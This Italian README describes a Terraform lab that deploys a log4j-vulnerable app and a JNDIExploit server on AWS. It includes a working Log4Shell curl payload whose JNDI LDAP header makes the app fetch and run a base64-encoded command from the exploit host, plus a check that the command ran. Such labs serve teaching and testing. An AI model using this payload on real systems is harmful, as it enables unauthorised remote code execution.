
Una configurazione Terraform per distribuire un'app vulnerabile e un JDNIExploit per lavorare con CVE-2021-44228.
Una configurazione Terraform per distribuire un'app vulnerabile e un JNDIExploit per lavorare con CVE-2021-44228
Questa configurazione Terraform crea due istanze in una VPC in AWS Cloud.
Devi solo esportare le tue AWS_ACCESS_KEY_ID e AWS_SECRET_ACCESS_KEY
Un'istanza è JNDIExploit.
La seconda è una Vulnerable-App per l'exploit di log4j
Sostituisci la tua chiave pubblica SSH nel codice Terraform prima dell'apply
terraform init
terraform plan
terraform apply --auto-approve
Dopo la distribuzione su AWS puoi sfruttarla con una richiesta curl e verificare la creazione del file in /tmp nel container vulnerable-app.
curl ${vulnerable-app-IP}:8090 -H 'X-Api-Version: ${jndi:ldap://${JNDIExploit-IP}:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
Sul server dell'app vulnerabile esegui il seguente comando per verificare l'esecuzione del comando; dovresti vedere il file pwned.
sudo docker exec -ti vulnerable-app ls /tmp